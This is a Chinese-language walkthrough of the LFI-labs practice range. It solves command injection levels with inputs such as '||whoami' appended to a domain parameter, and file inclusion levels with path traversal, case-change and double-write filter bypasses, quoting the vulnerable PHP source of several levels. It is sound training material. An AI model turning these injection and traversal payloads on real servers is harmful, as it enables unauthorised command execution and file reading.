803 字

4 分钟

LFI-labs

2026-01-15

靶场

LFI

CMD#

CMD-1#

will exec the arg specified in the GET parameter “cmd”

GET传参，需要cmd参数，搭建在Windows输入Windows命令whoami

1
url?cmd=whoami

显示bro\hp

CMD-2#

跟CMD-1一样不过是POST方法传参

CMD-3#

will exec ‘whois’ with the arg specified in the GET parameter “domain”

参数为domain，(一个域名)，然后调用系统命令whois，这里直接弄肯定不行，需要用上管道符

1
cmd1|cmd2:不论cmd1是否为真，cmd2都会被执行；
2
cmd1;cmd2：不论cmd1是否为真，cmd2都会被执行；
3
cmd1||cmd2：如果cmd1为假，则执行cmd2；
4
cmd1&&cmd2：如果cmd1为真，则执行cmd2；

那么就是

1
?domain=google.com||whoami

CMD-4#

paload构造和CMD-3一样，不过是POST方法

CMD-5#

not everything you need to inject is in a text input field …

根目录里看一下源码

1
<?php
2
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
3
        { system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); }
4
    else
5
        {echo "malformed domain name";}
6
?>

过滤了一堆东西，但是没有对server进行过滤，直接进行构造

1
?domain=whois -h 127.0.0.1||whoami|| facebook.com

CMD-6#

payload构造和CMD-5一样，不过是POST方法

LFI#

LFI-1#

看眼源码

1
<?php     include("../common/header.php");   ?>
2

3
<!-- from https://pentesterlab.com/exercises/php_include_and_post_exploitation/course -->
4
<?php hint("will include the arg specified in the GET parameter \"page\""); ?>
5

6
<form action="/LFI-1/index.php" method="GET">
7
    <input type="text" name="page">
8
</form>
9

10
<?php
11
include($_GET["page"]);
12
?>

GET传参page，在上级目录建一个test.php文件(里边可以写点内容，我是Welcome to test.php)构造payload

1
?page=../test.php

LFI-2#

看源码

1
<?php
2
include("includes/".$_GET['library'].".php");
3
?>

GET传参library，还会自动加上后缀.php 添加了要包含文件的上级路径。所以我们要跳出includes，那么就可以使用…/跳出最终include()加载的文件路径 = 当前脚本目录/includes/[输入的library值].php

1
# 假设服务器根目录（网站根目录）
2
/
3
└── LFI-2/                # 你的index.php所在目录（记为「当前目录」）
4
    ├── index.php         # 这份源码文件（核心）
5
    ├── includes/         # 代码中固定拼接的子目录（代码里硬编码了includes/）
6
    │   └── （系统默认的合法.php文件，无利用价值）
7
    └── test.php          # 要读取/包含的目标文件（题目中隐含的目标）

所以payload

1
?library=../../test    //会自动拼接.php

显示内容Welcome to test.php 如果

1
?library=../test

则会进入在LFI-2目录下的test.php文件显示yes! right place

LFI-3#

1
<?php
2
if (substr($_GET['file'], -4, 4) != '.php')
3
 echo file_get_contents($_GET['file']);
4
else
5
 echo 'You are not allowed to see source files!'."\n";
6
?>

这里其实是说后四个不是.php，就调用file_get_content函数，大小写绕过就好了，payload

1
?file=test.PHP#

LFI-4#

1
<form action="/LFI-4/index.php" method="GET">
2
    <input type="text" name="class">
3
</form>
4

5
<?php
6
include('includes/class_'.addslashes($_GET['class']).'.php');
7
?>

GET传参传class,然后addslashes函数

1
addslashes() 函数返回在 预定义的字符 前添加 反斜杠 的字符串。
2
预定义字符是：
3
- 单引号（'）
4
- 双引号（"）
5
- 反斜杠（\）
6
- NULL
7

8
然后 还会在输入的值 后 添加 .php

使用%00 截断和不添加后缀进行执行

1
?class=../../phpinfo

LFI-5#

1
<form action="/LFI-5/index.php" method="GET">
2
    <input type="text" name="file">
3
</form>
4

5

6

7
<?php
8
   $file = str_replace('../', '', $_GET['file']);
9
   if(isset($file))
10
   {
11
       include("pages/$file");
12
   }
13
   else
14
   {
15
       include("index.php");
16
   }
17
?>

双写绕过

1
?file=..././..././test.php

LFI-6-10#

前面五关LFI题的POST方式

LFI-11#

1
<form action="/LFI-11/index.php" method="POST">
2
    <input type="text" name="file">
3
    <input type="hidden" name="style" name="stylepath">
4
</form>
5

6
<?php include($_POST['stylepath']); ?>